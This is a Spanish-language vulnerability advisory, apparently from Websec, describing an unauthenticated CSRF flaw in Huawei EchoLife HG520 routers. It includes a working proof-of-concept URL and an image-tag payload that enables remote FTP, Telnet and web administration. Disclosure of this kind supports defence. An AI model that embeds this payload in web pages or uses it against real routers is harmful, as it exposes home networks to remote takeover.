Huawei EchoLife HG520 RemoteManagement CSRF

Huawei EchoLife HG520 RemoteManagement CSRF

Publicado en May 29 2010   |  Plain text version

Resumen

Las paginas de la interfaz de configuracion del router HG520: '/Forms/access_cwmp_1', '/Forms/rpQos_1' y '/Forms/rpRManage_1' no requieren autenticacion, se puede realizar un ataque CSRF para habilitar el acceso a las interfaces remotas.

Descripción

=========================================
HUAWEI ECHOLIFE HG520 RemoteManagement CSRF
=========================================


Dispositivo: Huawei EchoLife HG520
Version de Software: V100R001B021Telmex
V100R001B020Telmex
Version de Firmware: 3.10.18.7-1.0.7.0 (ultima version)
3.10.18.5-1.0.7.0
Modelos Vulnerables: HG520c
HG520b
Fecha de publicacion: 2010-04-00
Criticidad: Alto
Impacto: Habilita la interfaz de administracion remota en la WAN
Ubicacion: En la interfaz de administracion web (LAN/WAN)
Solucion: No existe solucion disponible en este momento
Websec-id: ws10-12


DESCRIPCION
=======================
Los modems HG520 publican una interfaz de administracion via web en la red local. Las paginas '/Forms/access_cwmp_1', '/Forms/rpQos_1' y '/Forms/rpRManage_1' no requieren autenticacion, se puede realizar un ataque de CSRF para habilitar el acceso a las interfaces de administracion desde internet.


EXPLOIT / POC
=======================
Se habilita el acceso remoto por FTP, TELNET y WEB mandando una peticion GET a:

http://192.168.1.254/Forms/rpRManage_1?ACL_active=0

Se podria usar Client-Side visitando una pagina que contenga:

<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>


SOLUCION
=======================
No existe parche o solucion disponible en este momento.


DISCLOSURE TIMELINE
=======================
2010/03/20 - Vulnerability discovered


REFERENCES
=======================
Hakim.Ws - http://www.hakim.ws
Websec - http://websec.mx


Websec.mx

POC

<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>


Últimas entradas en nuestro blog

Evadiendo Web Application Firewalls con SQLMap
Evadiendo web application firewalls y detectores de intrusos con los tamper scripts de SQLMap
Publicado en

Método para extraer datos de Blind SQLi
Técnica optimizada que permite extraer información de una base de datos MySQL utilizando las posiciones de un arreglo en binario. Este método supera los métodos conocidos como Bit Shifting y Bifurcación ya que requiere de menor cantidad de peticiones
Publicado en MySQL Base de Datos Blind Injection SQL Injection

mac2wepkey - Huawei generador de WEP default
Es posible generar la WEP/WPA default de los módems Huawei modelos HG520. El propósito de este post es explicar la forma en la que desarrollamos un generador para estos dispositivos.
Publicado en mac2wepkey huawei hg520 hg520b

Últimas noticias

May 16, 2012
Videos de GuadalajaraCON 2012
Videos de las conferencias del primer día del evento de seguridad informática organizado por Websec en Guadalajara, Jalisco, México.

Apr 27, 2012
GuadalajaraCON 2012 por Websec
El pasado 20 de abril se llevo a cabo el GuadalajaraCON 2012. Un evento de seguridad informática organizado por Websec en Guadalajara, Jalisco, México. El evento se caracterizó por su contenido técnico y una notable calidad de sus ponentes.